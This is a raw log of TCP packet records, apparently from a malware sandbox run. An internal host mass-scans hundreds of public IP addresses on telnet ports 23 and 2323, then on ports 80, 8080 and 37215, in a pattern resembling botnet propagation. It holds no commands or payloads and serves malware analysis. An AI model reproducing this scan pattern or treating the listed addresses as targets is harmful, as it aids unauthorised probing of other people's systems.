Feb 14, 2024 09:28:48.433542013 CET	1184	23	192.168.2.15	110.234.193.230
Feb 14, 2024 09:28:48.433547020 CET	1184	23	192.168.2.15	66.192.116.8
Feb 14, 2024 09:28:48.433554888 CET	1184	2323	192.168.2.15	189.249.182.126
Feb 14, 2024 09:28:48.433557987 CET	1184	23	192.168.2.15	175.61.40.155
Feb 14, 2024 09:28:48.433568001 CET	1184	23	192.168.2.15	150.149.157.123
Feb 14, 2024 09:28:48.433571100 CET	1184	23	192.168.2.15	213.251.178.170
Feb 14, 2024 09:28:48.433573008 CET	1184	23	192.168.2.15	12.244.0.193
Feb 14, 2024 09:28:48.433577061 CET	1184	23	192.168.2.15	34.45.68.9
Feb 14, 2024 09:28:48.433582067 CET	1184	23	192.168.2.15	94.229.10.254
Feb 14, 2024 09:28:48.433592081 CET	1184	23	192.168.2.15	38.66.114.136
Feb 14, 2024 09:28:48.433597088 CET	1184	23	192.168.2.15	31.66.1.65
Feb 14, 2024 09:28:48.433597088 CET	1184	23	192.168.2.15	1.202.53.168
Feb 14, 2024 09:28:48.433609962 CET	1184	2323	192.168.2.15	202.4.140.116
Feb 14, 2024 09:28:48.433615923 CET	1184	23	192.168.2.15	138.157.144.248
Feb 14, 2024 09:28:48.433623075 CET	1184	23	192.168.2.15	111.42.56.65
Feb 14, 2024 09:28:48.433630943 CET	1184	23	192.168.2.15	12.17.194.14
Feb 14, 2024 09:28:48.433636904 CET	1184	23	192.168.2.15	145.185.120.17
Feb 14, 2024 09:28:48.433640003 CET	1184	23	192.168.2.15	51.10.249.104
Feb 14, 2024 09:28:48.433654070 CET	1184	23	192.168.2.15	206.235.147.177
Feb 14, 2024 09:28:48.433656931 CET	1184	23	192.168.2.15	18.98.206.240
Feb 14, 2024 09:28:48.433664083 CET	1184	23	192.168.2.15	80.251.232.154
Feb 14, 2024 09:28:48.433677912 CET	1184	23	192.168.2.15	199.241.170.188
Feb 14, 2024 09:28:48.433681965 CET	1184	2323	192.168.2.15	2.127.197.214
Feb 14, 2024 09:28:48.433685064 CET	1184	23	192.168.2.15	130.194.157.83
Feb 14, 2024 09:28:48.433685064 CET	1184	23	192.168.2.15	84.133.226.188
Feb 14, 2024 09:28:48.433690071 CET	1184	23	192.168.2.15	17.249.173.237
Feb 14, 2024 09:28:48.433693886 CET	1184	23	192.168.2.15	213.49.223.95
Feb 14, 2024 09:28:48.433693886 CET	1184	23	192.168.2.15	27.197.3.248
Feb 14, 2024 09:28:48.433696985 CET	1184	23	192.168.2.15	118.39.107.17
Feb 14, 2024 09:28:48.433696985 CET	1184	23	192.168.2.15	137.112.122.162
Feb 14, 2024 09:28:48.433702946 CET	1184	23	192.168.2.15	220.213.137.250
Feb 14, 2024 09:28:48.433702946 CET	1184	23	192.168.2.15	50.221.57.162
Feb 14, 2024 09:28:48.433707952 CET	1184	23	192.168.2.15	37.135.194.203
Feb 14, 2024 09:28:48.433716059 CET	1184	23	192.168.2.15	159.94.222.35
Feb 14, 2024 09:28:48.433722973 CET	1184	2323	192.168.2.15	115.128.9.142
Feb 14, 2024 09:28:48.433727026 CET	1184	23	192.168.2.15	123.243.180.250
Feb 14, 2024 09:28:48.433737993 CET	1184	23	192.168.2.15	217.28.83.214
Feb 14, 2024 09:28:48.433737993 CET	1184	23	192.168.2.15	131.203.200.57
Feb 14, 2024 09:28:48.433747053 CET	1184	23	192.168.2.15	200.136.234.200
Feb 14, 2024 09:28:48.433748960 CET	1184	23	192.168.2.15	183.246.177.52
Feb 14, 2024 09:28:48.433763027 CET	1184	23	192.168.2.15	75.139.81.161
Feb 14, 2024 09:28:48.433763027 CET	1184	23	192.168.2.15	38.148.238.132
Feb 14, 2024 09:28:48.433770895 CET	1184	2323	192.168.2.15	203.188.220.155
Feb 14, 2024 09:28:48.433784008 CET	1184	23	192.168.2.15	40.168.74.218
Feb 14, 2024 09:28:48.433787107 CET	1184	23	192.168.2.15	87.211.126.238
Feb 14, 2024 09:28:48.433794022 CET	1184	23	192.168.2.15	196.86.184.39
Feb 14, 2024 09:28:48.433798075 CET	1184	23	192.168.2.15	193.216.254.12
Feb 14, 2024 09:28:48.433799982 CET	1184	23	192.168.2.15	44.203.243.88
Feb 14, 2024 09:28:48.433810949 CET	1184	23	192.168.2.15	42.158.200.171
Feb 14, 2024 09:28:48.433813095 CET	1184	23	192.168.2.15	179.11.179.38
Feb 14, 2024 09:28:48.433816910 CET	1184	23	192.168.2.15	83.57.222.128
Feb 14, 2024 09:28:48.433819056 CET	1184	23	192.168.2.15	126.153.82.30
Feb 14, 2024 09:28:48.433826923 CET	1184	2323	192.168.2.15	118.162.214.137
Feb 14, 2024 09:28:48.433828115 CET	1184	23	192.168.2.15	167.5.47.213
Feb 14, 2024 09:28:48.433840036 CET	1184	23	192.168.2.15	165.112.156.232
Feb 14, 2024 09:28:48.433840036 CET	1184	23	192.168.2.15	32.208.69.253
Feb 14, 2024 09:28:48.433841944 CET	1184	23	192.168.2.15	107.212.33.15
Feb 14, 2024 09:28:48.433845997 CET	1184	23	192.168.2.15	25.218.246.219
Feb 14, 2024 09:28:48.433857918 CET	1184	23	192.168.2.15	39.184.238.68
Feb 14, 2024 09:28:48.433857918 CET	1184	23	192.168.2.15	108.73.21.1
Feb 14, 2024 09:28:48.433861017 CET	1184	23	192.168.2.15	184.80.194.192
Feb 14, 2024 09:28:48.433864117 CET	1184	23	192.168.2.15	73.18.5.214
Feb 14, 2024 09:28:48.433866978 CET	1184	2323	192.168.2.15	154.213.146.18
Feb 14, 2024 09:28:48.433876038 CET	1184	23	192.168.2.15	96.234.198.110
Feb 14, 2024 09:28:48.433891058 CET	1184	23	192.168.2.15	160.138.200.139
Feb 14, 2024 09:28:48.433893919 CET	1184	23	192.168.2.15	124.71.17.222
Feb 14, 2024 09:28:48.433895111 CET	1184	23	192.168.2.15	141.235.59.66
Feb 14, 2024 09:28:48.433893919 CET	1184	23	192.168.2.15	168.36.48.110
Feb 14, 2024 09:28:48.433900118 CET	1184	23	192.168.2.15	63.12.89.178
Feb 14, 2024 09:28:48.433904886 CET	1184	23	192.168.2.15	162.150.198.176
Feb 14, 2024 09:28:48.433916092 CET	1184	23	192.168.2.15	60.120.136.8
Feb 14, 2024 09:28:48.433918953 CET	1184	23	192.168.2.15	210.63.15.46
Feb 14, 2024 09:28:48.433933020 CET	1184	2323	192.168.2.15	51.176.172.21
Feb 14, 2024 09:28:48.433933973 CET	1184	23	192.168.2.15	129.174.27.72
Feb 14, 2024 09:28:48.433937073 CET	1184	23	192.168.2.15	217.82.206.169
Feb 14, 2024 09:28:48.433939934 CET	1184	23	192.168.2.15	68.11.225.204
Feb 14, 2024 09:28:48.433952093 CET	1184	23	192.168.2.15	77.249.213.84
Feb 14, 2024 09:28:48.433952093 CET	1184	23	192.168.2.15	81.225.124.23
Feb 14, 2024 09:28:48.433960915 CET	1184	23	192.168.2.15	164.99.167.210
Feb 14, 2024 09:28:48.433962107 CET	1184	23	192.168.2.15	75.167.176.234
Feb 14, 2024 09:28:48.433968067 CET	1184	23	192.168.2.15	82.49.212.53
Feb 14, 2024 09:28:48.433974981 CET	1184	23	192.168.2.15	40.173.113.245
Feb 14, 2024 09:28:48.433980942 CET	1184	2323	192.168.2.15	90.171.71.131
Feb 14, 2024 09:28:48.433981895 CET	1184	23	192.168.2.15	116.40.209.199
Feb 14, 2024 09:28:48.433994055 CET	1184	23	192.168.2.15	51.232.48.4
Feb 14, 2024 09:28:48.433999062 CET	1184	23	192.168.2.15	58.232.187.252
Feb 14, 2024 09:28:48.433999062 CET	1184	23	192.168.2.15	64.229.62.123
Feb 14, 2024 09:28:48.434009075 CET	1184	23	192.168.2.15	40.196.97.36
Feb 14, 2024 09:28:48.434011936 CET	1184	23	192.168.2.15	77.176.1.147
Feb 14, 2024 09:28:48.434014082 CET	1184	23	192.168.2.15	73.53.76.64
Feb 14, 2024 09:28:48.434014082 CET	1184	23	192.168.2.15	164.169.93.2
Feb 14, 2024 09:28:48.434020996 CET	1184	23	192.168.2.15	81.158.204.142
Feb 14, 2024 09:28:48.434027910 CET	1184	23	192.168.2.15	43.4.91.218
Feb 14, 2024 09:28:48.434039116 CET	1184	2323	192.168.2.15	77.195.149.157
Feb 14, 2024 09:28:48.434039116 CET	1184	23	192.168.2.15	198.125.53.160
Feb 14, 2024 09:28:48.434039116 CET	1184	23	192.168.2.15	116.6.180.219
Feb 14, 2024 09:28:48.434047937 CET	1184	23	192.168.2.15	36.210.17.52
Feb 14, 2024 09:28:48.434062004 CET	1184	23	192.168.2.15	147.83.67.85
Feb 14, 2024 09:28:48.434062958 CET	1184	23	192.168.2.15	98.68.137.198
Feb 14, 2024 09:28:48.434066057 CET	1184	23	192.168.2.15	195.7.33.187
Feb 14, 2024 09:28:48.434066057 CET	1184	23	192.168.2.15	207.169.245.160
Feb 14, 2024 09:28:48.434067965 CET	1184	23	192.168.2.15	223.179.184.191
Feb 14, 2024 09:28:48.434077978 CET	1184	2323	192.168.2.15	182.36.15.89
Feb 14, 2024 09:28:48.434081078 CET	1184	23	192.168.2.15	44.146.134.198
Feb 14, 2024 09:28:48.434086084 CET	1184	23	192.168.2.15	23.153.184.225
Feb 14, 2024 09:28:48.434087038 CET	1184	23	192.168.2.15	118.16.180.95
Feb 14, 2024 09:28:48.434089899 CET	1184	23	192.168.2.15	108.3.199.60
Feb 14, 2024 09:28:48.434096098 CET	1184	23	192.168.2.15	167.30.119.179
Feb 14, 2024 09:28:48.434103012 CET	1184	23	192.168.2.15	186.185.70.135
Feb 14, 2024 09:28:48.434111118 CET	1184	23	192.168.2.15	172.139.158.90
Feb 14, 2024 09:28:48.434117079 CET	1184	23	192.168.2.15	74.193.249.28
Feb 14, 2024 09:28:48.434119940 CET	1184	23	192.168.2.15	44.105.155.114
Feb 14, 2024 09:28:48.434129000 CET	1184	2323	192.168.2.15	186.44.124.139
Feb 14, 2024 09:28:48.434134960 CET	1184	23	192.168.2.15	79.243.124.163
Feb 14, 2024 09:28:48.434139013 CET	1184	23	192.168.2.15	9.189.90.206
Feb 14, 2024 09:28:48.434139013 CET	1184	23	192.168.2.15	210.228.206.212
Feb 14, 2024 09:28:48.434149027 CET	1184	23	192.168.2.15	111.100.110.86
Feb 14, 2024 09:28:48.434151888 CET	1184	23	192.168.2.15	82.40.17.7
Feb 14, 2024 09:28:48.434165955 CET	1184	23	192.168.2.15	155.250.181.248
Feb 14, 2024 09:28:48.434166908 CET	1184	23	192.168.2.15	106.249.2.159
Feb 14, 2024 09:28:48.434165955 CET	1184	23	192.168.2.15	97.213.135.106
Feb 14, 2024 09:28:48.434170961 CET	1184	23	192.168.2.15	75.100.183.33
Feb 14, 2024 09:28:48.434171915 CET	1184	2323	192.168.2.15	87.212.223.24
Feb 14, 2024 09:28:48.434184074 CET	1184	23	192.168.2.15	27.164.178.155
Feb 14, 2024 09:28:48.434185982 CET	1184	23	192.168.2.15	61.171.152.8
Feb 14, 2024 09:28:48.434195042 CET	1184	23	192.168.2.15	69.237.244.28
Feb 14, 2024 09:28:48.434200048 CET	1184	23	192.168.2.15	146.61.207.5
Feb 14, 2024 09:28:48.434211969 CET	1184	23	192.168.2.15	115.75.165.45
Feb 14, 2024 09:28:48.434212923 CET	1184	23	192.168.2.15	47.123.10.65
Feb 14, 2024 09:28:48.434214115 CET	1184	23	192.168.2.15	153.78.58.131
Feb 14, 2024 09:28:48.434227943 CET	1184	23	192.168.2.15	53.215.153.65
Feb 14, 2024 09:28:48.434228897 CET	1184	23	192.168.2.15	131.216.124.251
Feb 14, 2024 09:28:48.434235096 CET	1184	2323	192.168.2.15	223.168.159.28
Feb 14, 2024 09:28:48.434235096 CET	1184	23	192.168.2.15	176.34.79.80
Feb 14, 2024 09:28:48.434237003 CET	1184	23	192.168.2.15	218.227.243.165
Feb 14, 2024 09:28:48.434245110 CET	1184	23	192.168.2.15	207.127.142.160
Feb 14, 2024 09:28:48.434248924 CET	1184	23	192.168.2.15	152.16.53.191
Feb 14, 2024 09:28:48.434257030 CET	1184	23	192.168.2.15	44.40.23.96
Feb 14, 2024 09:28:48.434268951 CET	1184	23	192.168.2.15	92.204.147.192
Feb 14, 2024 09:28:48.434268951 CET	1184	23	192.168.2.15	192.147.89.141
Feb 14, 2024 09:28:48.434272051 CET	1184	23	192.168.2.15	148.35.158.206
Feb 14, 2024 09:28:48.434277058 CET	1184	23	192.168.2.15	34.135.206.12
Feb 14, 2024 09:28:48.434277058 CET	1184	2323	192.168.2.15	132.53.177.144
Feb 14, 2024 09:28:48.434282064 CET	1184	23	192.168.2.15	111.250.26.164
Feb 14, 2024 09:28:48.434287071 CET	1184	23	192.168.2.15	23.13.56.3
Feb 14, 2024 09:28:48.434293032 CET	1184	23	192.168.2.15	130.122.96.128
Feb 14, 2024 09:28:48.434303045 CET	1184	23	192.168.2.15	135.195.2.138
Feb 14, 2024 09:28:48.434310913 CET	1184	23	192.168.2.15	136.103.149.105
Feb 14, 2024 09:28:48.434314013 CET	1184	23	192.168.2.15	158.78.168.226
Feb 14, 2024 09:28:48.434319973 CET	1184	23	192.168.2.15	211.163.189.67
Feb 14, 2024 09:28:48.434330940 CET	1184	23	192.168.2.15	151.181.179.38
Feb 14, 2024 09:28:48.434336901 CET	1184	23	192.168.2.15	39.6.67.33
Feb 14, 2024 09:28:48.434341908 CET	1184	2323	192.168.2.15	36.88.130.112
Feb 14, 2024 09:28:48.434355021 CET	1184	23	192.168.2.15	196.137.67.48
Feb 14, 2024 09:28:48.434355021 CET	1184	23	192.168.2.15	85.136.67.228
Feb 14, 2024 09:28:48.434356928 CET	1184	23	192.168.2.15	53.147.24.20
Feb 14, 2024 09:28:48.434357882 CET	1184	23	192.168.2.15	147.238.194.91
Feb 14, 2024 09:28:48.434361935 CET	1184	23	192.168.2.15	186.24.173.82
Feb 14, 2024 09:28:48.434361935 CET	1184	23	192.168.2.15	190.227.205.99
Feb 14, 2024 09:28:48.434361935 CET	1184	23	192.168.2.15	44.206.147.62
Feb 14, 2024 09:28:48.434381008 CET	1184	23	192.168.2.15	32.211.219.164
Feb 14, 2024 09:28:48.434381008 CET	1184	23	192.168.2.15	205.119.33.11
Feb 14, 2024 09:28:48.434381008 CET	1184	2323	192.168.2.15	201.178.162.225
Feb 14, 2024 09:28:48.434396982 CET	1184	23	192.168.2.15	90.0.157.83
Feb 14, 2024 09:28:48.434401989 CET	1184	23	192.168.2.15	18.167.15.237
Feb 14, 2024 09:28:48.434401989 CET	1184	23	192.168.2.15	144.70.99.227
Feb 14, 2024 09:28:48.434406042 CET	1184	23	192.168.2.15	88.127.57.17
Feb 14, 2024 09:28:48.434413910 CET	1184	23	192.168.2.15	164.151.117.210
Feb 14, 2024 09:28:48.434421062 CET	1184	23	192.168.2.15	37.174.8.122
Feb 14, 2024 09:28:48.434427023 CET	1184	23	192.168.2.15	192.140.58.195
Feb 14, 2024 09:28:48.434432983 CET	1184	23	192.168.2.15	119.97.184.78
Feb 14, 2024 09:28:48.434438944 CET	1184	23	192.168.2.15	59.165.247.70
Feb 14, 2024 09:28:48.434443951 CET	1184	2323	192.168.2.15	209.58.68.139
Feb 14, 2024 09:28:48.434447050 CET	1184	23	192.168.2.15	196.129.190.22
Feb 14, 2024 09:28:48.434452057 CET	1184	23	192.168.2.15	68.178.27.5
Feb 14, 2024 09:28:48.434462070 CET	1184	23	192.168.2.15	107.37.16.1
Feb 14, 2024 09:28:48.434464931 CET	1184	23	192.168.2.15	142.237.121.7
Feb 14, 2024 09:28:48.434475899 CET	1184	23	192.168.2.15	117.161.59.43
Feb 14, 2024 09:28:48.434484005 CET	1184	23	192.168.2.15	161.22.249.105
Feb 14, 2024 09:28:48.434484005 CET	1184	23	192.168.2.15	51.64.131.51
Feb 14, 2024 09:28:48.434487104 CET	1184	23	192.168.2.15	51.38.187.77
Feb 14, 2024 09:28:48.434492111 CET	1184	23	192.168.2.15	141.74.238.138
Feb 14, 2024 09:28:48.434494972 CET	1184	2323	192.168.2.15	20.80.133.249
Feb 14, 2024 09:28:48.434505939 CET	1184	23	192.168.2.15	36.162.175.87
Feb 14, 2024 09:28:48.434509993 CET	1184	23	192.168.2.15	31.170.29.50
Feb 14, 2024 09:28:48.434511900 CET	1184	23	192.168.2.15	168.203.83.89
Feb 14, 2024 09:28:48.434523106 CET	1184	23	192.168.2.15	106.100.35.124
Feb 14, 2024 09:28:48.434524059 CET	1184	23	192.168.2.15	39.243.18.220
Feb 14, 2024 09:28:48.434535027 CET	1184	23	192.168.2.15	70.88.209.76
Feb 14, 2024 09:28:48.434540033 CET	1184	23	192.168.2.15	121.82.32.216
Feb 14, 2024 09:28:48.434546947 CET	1184	23	192.168.2.15	51.141.180.159
Feb 14, 2024 09:28:48.434554100 CET	1184	23	192.168.2.15	147.188.202.202
Feb 14, 2024 09:28:48.434554100 CET	1184	2323	192.168.2.15	42.131.242.167
Feb 14, 2024 09:28:48.434560061 CET	1184	23	192.168.2.15	204.39.87.52
Feb 14, 2024 09:28:48.434570074 CET	1184	23	192.168.2.15	78.224.97.57
Feb 14, 2024 09:28:48.434571981 CET	1184	23	192.168.2.15	149.251.57.46
Feb 14, 2024 09:28:48.434580088 CET	1184	23	192.168.2.15	119.56.241.192
Feb 14, 2024 09:28:48.434593916 CET	1184	23	192.168.2.15	221.26.222.84
Feb 14, 2024 09:28:48.434595108 CET	1184	23	192.168.2.15	216.201.101.100
Feb 14, 2024 09:28:48.434602022 CET	1184	23	192.168.2.15	78.48.229.229
Feb 14, 2024 09:28:48.434607029 CET	1184	23	192.168.2.15	203.253.176.113
Feb 14, 2024 09:28:48.434608936 CET	1184	23	192.168.2.15	20.222.232.7
Feb 14, 2024 09:28:48.434621096 CET	1184	2323	192.168.2.15	203.100.253.213
Feb 14, 2024 09:28:48.434624910 CET	1184	23	192.168.2.15	176.102.14.140
Feb 14, 2024 09:28:48.434633970 CET	1184	23	192.168.2.15	196.224.192.255
Feb 14, 2024 09:28:48.434637070 CET	1184	23	192.168.2.15	151.38.2.202
Feb 14, 2024 09:28:48.434642076 CET	1184	23	192.168.2.15	78.199.80.233
Feb 14, 2024 09:28:48.434648037 CET	1184	23	192.168.2.15	121.14.139.19
Feb 14, 2024 09:28:48.434655905 CET	1184	23	192.168.2.15	174.144.252.230
Feb 14, 2024 09:28:48.434662104 CET	1184	23	192.168.2.15	209.8.122.21
Feb 14, 2024 09:28:48.434668064 CET	1184	23	192.168.2.15	44.58.226.62
Feb 14, 2024 09:28:48.434668064 CET	1184	23	192.168.2.15	83.127.35.146
Feb 14, 2024 09:28:48.434683084 CET	1184	23	192.168.2.15	102.29.52.68
Feb 14, 2024 09:28:48.434684038 CET	1184	2323	192.168.2.15	131.70.181.45
Feb 14, 2024 09:28:48.434684038 CET	1184	23	192.168.2.15	205.132.93.239
Feb 14, 2024 09:28:48.434691906 CET	1184	23	192.168.2.15	130.27.224.132
Feb 14, 2024 09:28:48.434706926 CET	1184	23	192.168.2.15	125.255.193.53
Feb 14, 2024 09:28:48.434708118 CET	1184	23	192.168.2.15	186.95.51.14
Feb 14, 2024 09:28:48.434714079 CET	1184	23	192.168.2.15	203.150.3.201
Feb 14, 2024 09:28:48.434714079 CET	1184	23	192.168.2.15	118.2.107.183
Feb 14, 2024 09:28:48.434715986 CET	1184	23	192.168.2.15	199.228.200.140
Feb 14, 2024 09:28:48.434726000 CET	1184	23	192.168.2.15	142.34.102.241
Feb 14, 2024 09:28:48.434731007 CET	1184	2323	192.168.2.15	174.168.106.39
Feb 14, 2024 09:28:48.434737921 CET	1184	23	192.168.2.15	13.99.2.230
Feb 14, 2024 09:28:48.434753895 CET	1184	23	192.168.2.15	172.92.191.197
Feb 14, 2024 09:28:48.434756994 CET	1184	23	192.168.2.15	77.182.119.235
Feb 14, 2024 09:28:48.443300962 CET	49732	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:48.456047058 CET	80	57552	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:48.456118107 CET	57552	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:48.470326900 CET	8080	6752	62.112.138.143	192.168.2.15
Feb 14, 2024 09:28:48.489475965 CET	8080	35596	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.489554882 CET	35596	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.507303953 CET	58958	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:48.509198904 CET	8080	35596	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.532409906 CET	37215	8096	41.227.22.97	192.168.2.15
Feb 14, 2024 09:28:48.532757044 CET	8080	35596	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.539305925 CET	35590	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.539328098 CET	39042	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:48.541959047 CET	37215	8096	41.137.138.228	192.168.2.15
Feb 14, 2024 09:28:48.553653002 CET	2323	1184	93.120.7.67	192.168.2.15
Feb 14, 2024 09:28:48.585736036 CET	23	1184	38.148.238.132	192.168.2.15
Feb 14, 2024 09:28:48.601571083 CET	23	1184	74.50.231.241	192.168.2.15
Feb 14, 2024 09:28:48.633431911 CET	23	1184	31.170.29.50	192.168.2.15
Feb 14, 2024 09:28:48.650932074 CET	37215	8096	41.161.59.180	192.168.2.15
Feb 14, 2024 09:28:48.654855967 CET	37215	8096	41.160.127.97	192.168.2.15
Feb 14, 2024 09:28:48.663031101 CET	23	1184	137.101.89.210	192.168.2.15
Feb 14, 2024 09:28:48.673883915 CET	37215	8096	41.191.228.29	192.168.2.15
Feb 14, 2024 09:28:48.698379040 CET	23	1184	102.29.52.68	192.168.2.15
Feb 14, 2024 09:28:48.698558092 CET	1184	23	192.168.2.15	102.29.52.68
Feb 14, 2024 09:28:48.699554920 CET	23	1184	102.29.52.68	192.168.2.15
Feb 14, 2024 09:28:48.701956034 CET	23	1184	60.120.136.8	192.168.2.15
Feb 14, 2024 09:28:48.726007938 CET	2323	1184	36.238.45.248	192.168.2.15
Feb 14, 2024 09:28:48.755685091 CET	23	1184	60.8.133.174	192.168.2.15
Feb 14, 2024 09:28:48.759521008 CET	8080	35590	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.774755955 CET	8080	35590	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.825700998 CET	23	1184	111.42.56.65	192.168.2.15
Feb 14, 2024 09:28:49.011492968 CET	7840	80	192.168.2.15	112.169.76.245
Feb 14, 2024 09:28:49.011553049 CET	7840	80	192.168.2.15	112.31.47.91
Feb 14, 2024 09:28:49.011620045 CET	7840	80	192.168.2.15	112.186.222.222
Feb 14, 2024 09:28:49.011661053 CET	7840	80	192.168.2.15	112.83.109.231
Feb 14, 2024 09:28:49.011709929 CET	7840	80	192.168.2.15	112.79.138.247
Feb 14, 2024 09:28:49.011773109 CET	7840	80	192.168.2.15	112.84.112.115
Feb 14, 2024 09:28:49.011835098 CET	7840	80	192.168.2.15	112.221.26.128
Feb 14, 2024 09:28:49.011890888 CET	7840	80	192.168.2.15	112.76.82.217
Feb 14, 2024 09:28:49.011938095 CET	7840	80	192.168.2.15	112.195.172.11
Feb 14, 2024 09:28:49.011975050 CET	7840	80	192.168.2.15	112.156.136.174
Feb 14, 2024 09:28:49.012015104 CET	7840	80	192.168.2.15	112.50.31.243
Feb 14, 2024 09:28:49.012062073 CET	7840	80	192.168.2.15	112.160.177.112
Feb 14, 2024 09:28:49.012109041 CET	7840	80	192.168.2.15	112.234.174.204
Feb 14, 2024 09:28:49.012155056 CET	7840	80	192.168.2.15	112.64.239.16
Feb 14, 2024 09:28:49.012203932 CET	7840	80	192.168.2.15	112.213.34.6
Feb 14, 2024 09:28:49.012245893 CET	7840	80	192.168.2.15	112.122.211.170
Feb 14, 2024 09:28:49.012290001 CET	7840	80	192.168.2.15	112.50.223.13
Feb 14, 2024 09:28:49.012337923 CET	7840	80	192.168.2.15	112.203.103.101
Feb 14, 2024 09:28:49.012376070 CET	7840	80	192.168.2.15	112.19.28.180
Feb 14, 2024 09:28:49.012414932 CET	7840	80	192.168.2.15	112.118.147.50
Feb 14, 2024 09:28:49.012460947 CET	7840	80	192.168.2.15	112.8.174.59
Feb 14, 2024 09:28:49.012509108 CET	7840	80	192.168.2.15	112.201.249.102
Feb 14, 2024 09:28:49.012550116 CET	7840	80	192.168.2.15	112.167.174.182
Feb 14, 2024 09:28:49.012588978 CET	7840	80	192.168.2.15	112.193.59.67
Feb 14, 2024 09:28:49.012625933 CET	7840	80	192.168.2.15	112.34.55.9
Feb 14, 2024 09:28:49.012675047 CET	7840	80	192.168.2.15	112.41.32.71
Feb 14, 2024 09:28:49.012739897 CET	7840	80	192.168.2.15	112.44.248.178
Feb 14, 2024 09:28:49.012787104 CET	7840	80	192.168.2.15	112.85.117.50
Feb 14, 2024 09:28:49.012831926 CET	7840	80	192.168.2.15	112.109.231.152
Feb 14, 2024 09:28:49.012888908 CET	7840	80	192.168.2.15	112.75.10.255
Feb 14, 2024 09:28:49.012957096 CET	7840	80	192.168.2.15	112.63.186.193
Feb 14, 2024 09:28:49.012995958 CET	7840	80	192.168.2.15	112.85.254.35
Feb 14, 2024 09:28:49.013037920 CET	7840	80	192.168.2.15	112.77.20.50
Feb 14, 2024 09:28:49.013093948 CET	7840	80	192.168.2.15	112.40.215.136
Feb 14, 2024 09:28:49.013159037 CET	7840	80	192.168.2.15	112.36.171.245
Feb 14, 2024 09:28:49.013205051 CET	7840	80	192.168.2.15	112.116.116.32
Feb 14, 2024 09:28:49.013252974 CET	7840	80	192.168.2.15	112.19.72.90
Feb 14, 2024 09:28:49.013290882 CET	7840	80	192.168.2.15	112.108.87.86
Feb 14, 2024 09:28:49.013338089 CET	7840	80	192.168.2.15	112.5.238.238
Feb 14, 2024 09:28:49.013375998 CET	7840	80	192.168.2.15	112.160.209.244
Feb 14, 2024 09:28:49.013433933 CET	7840	80	192.168.2.15	112.71.176.232
Feb 14, 2024 09:28:49.013478041 CET	7840	80	192.168.2.15	112.250.136.171
Feb 14, 2024 09:28:49.013529062 CET	7840	80	192.168.2.15	112.7.203.169
Feb 14, 2024 09:28:49.013569117 CET	7840	80	192.168.2.15	112.169.109.50
Feb 14, 2024 09:28:49.013606071 CET	7840	80	192.168.2.15	112.1.202.107
Feb 14, 2024 09:28:49.013674974 CET	7840	80	192.168.2.15	112.181.157.198
Feb 14, 2024 09:28:49.013710022 CET	7840	80	192.168.2.15	112.110.204.137
Feb 14, 2024 09:28:49.013864040 CET	7840	80	192.168.2.15	112.195.129.151
Feb 14, 2024 09:28:49.013948917 CET	7840	80	192.168.2.15	112.236.81.32
Feb 14, 2024 09:28:49.013998985 CET	7840	80	192.168.2.15	112.84.37.114
Feb 14, 2024 09:28:49.014036894 CET	7840	80	192.168.2.15	112.23.209.198
Feb 14, 2024 09:28:49.014084101 CET	7840	80	192.168.2.15	112.51.134.171
Feb 14, 2024 09:28:49.014159918 CET	7840	80	192.168.2.15	112.121.149.122
Feb 14, 2024 09:28:49.014195919 CET	7840	80	192.168.2.15	112.60.227.47
Feb 14, 2024 09:28:49.014234066 CET	7840	80	192.168.2.15	112.164.149.181
Feb 14, 2024 09:28:49.014271975 CET	7840	80	192.168.2.15	112.48.112.59
Feb 14, 2024 09:28:49.014317989 CET	7840	80	192.168.2.15	112.10.139.151
Feb 14, 2024 09:28:49.014357090 CET	7840	80	192.168.2.15	112.85.21.12
Feb 14, 2024 09:28:49.014394999 CET	7840	80	192.168.2.15	112.202.10.91
Feb 14, 2024 09:28:49.014431000 CET	7840	80	192.168.2.15	112.31.155.152
Feb 14, 2024 09:28:49.014472008 CET	7840	80	192.168.2.15	112.133.58.228
Feb 14, 2024 09:28:49.014522076 CET	7840	80	192.168.2.15	112.41.36.150
Feb 14, 2024 09:28:49.014575005 CET	7840	80	192.168.2.15	112.153.248.232
Feb 14, 2024 09:28:49.014614105 CET	7840	80	192.168.2.15	112.62.209.23
Feb 14, 2024 09:28:49.014659882 CET	7840	80	192.168.2.15	112.251.161.67
Feb 14, 2024 09:28:49.014708042 CET	7840	80	192.168.2.15	112.138.118.154
Feb 14, 2024 09:28:49.014791965 CET	7840	80	192.168.2.15	112.4.100.44
Feb 14, 2024 09:28:49.014828920 CET	7840	80	192.168.2.15	112.168.123.224
Feb 14, 2024 09:28:49.014878035 CET	7840	80	192.168.2.15	112.118.126.163
Feb 14, 2024 09:28:49.014923096 CET	7840	80	192.168.2.15	112.125.94.154
Feb 14, 2024 09:28:49.014971018 CET	7840	80	192.168.2.15	112.252.55.244
Feb 14, 2024 09:28:49.015017986 CET	7840	80	192.168.2.15	112.67.194.237
Feb 14, 2024 09:28:49.015084982 CET	7840	80	192.168.2.15	112.191.45.38
Feb 14, 2024 09:28:49.015130043 CET	7840	80	192.168.2.15	112.8.226.196
Feb 14, 2024 09:28:49.015171051 CET	7840	80	192.168.2.15	112.68.108.32
Feb 14, 2024 09:28:49.015233994 CET	7840	80	192.168.2.15	112.23.137.174
Feb 14, 2024 09:28:49.015312910 CET	7840	80	192.168.2.15	112.103.164.46
Feb 14, 2024 09:28:49.015371084 CET	7840	80	192.168.2.15	112.128.164.135
Feb 14, 2024 09:28:49.015417099 CET	7840	80	192.168.2.15	112.216.50.191
Feb 14, 2024 09:28:49.015464067 CET	7840	80	192.168.2.15	112.159.26.89
Feb 14, 2024 09:28:49.015511990 CET	7840	80	192.168.2.15	112.75.141.101
Feb 14, 2024 09:28:49.015575886 CET	7840	80	192.168.2.15	112.47.164.34
Feb 14, 2024 09:28:49.015625000 CET	7840	80	192.168.2.15	112.125.218.90
